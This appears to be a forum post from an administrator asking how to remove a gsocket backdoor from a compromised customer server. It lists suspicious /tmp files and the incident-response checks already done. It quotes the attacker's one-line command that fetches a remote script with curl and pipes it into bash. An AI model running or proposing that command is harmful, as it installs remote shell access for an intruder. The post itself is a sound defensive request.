30Eki
Removing Gsocket.io connection from server
My customer server has been compromised. They running this script by the PHP script
bash -c "$(curl -fsSL https://gsocket.io/x)"
and I have several folder in /tmp file as below
-rw------- 1 *** *** 153310 Sep 30 12:07 phpb0wrlJ
-rw------- 1 *** *** 65536 Sep 29 13:50 phpc29KRO
-rw------- 1 *** *** 40960 Sep 30 12:43 phpdrvPac
-rw------- 1 *** *** 49152 Sep 29 14:30 phpOWdcZw
That really suspicious. I have:
- Check for new users or unauthorized changes in /etc/passwd and /etc/shadow files.
- Analyze network connections with commands like netstat -tulnp or ss -tuln, looking for unfamiliar listening services or connections.
- Examine running processes with ps aux to identify suspicious scripts or binaries.
- Review log files in /var/log, specifically auth.log, syslog, or messages, for any unauthorized logins, sudo usage, or other unusual activity.
- Find unfamiliar files in critical directories, such as /tmp, /var/tmp, /home, /etc, or any binary directories like /usr/local/bin.
My question, how to remove the gsocket access from my server?
Thank you in advance.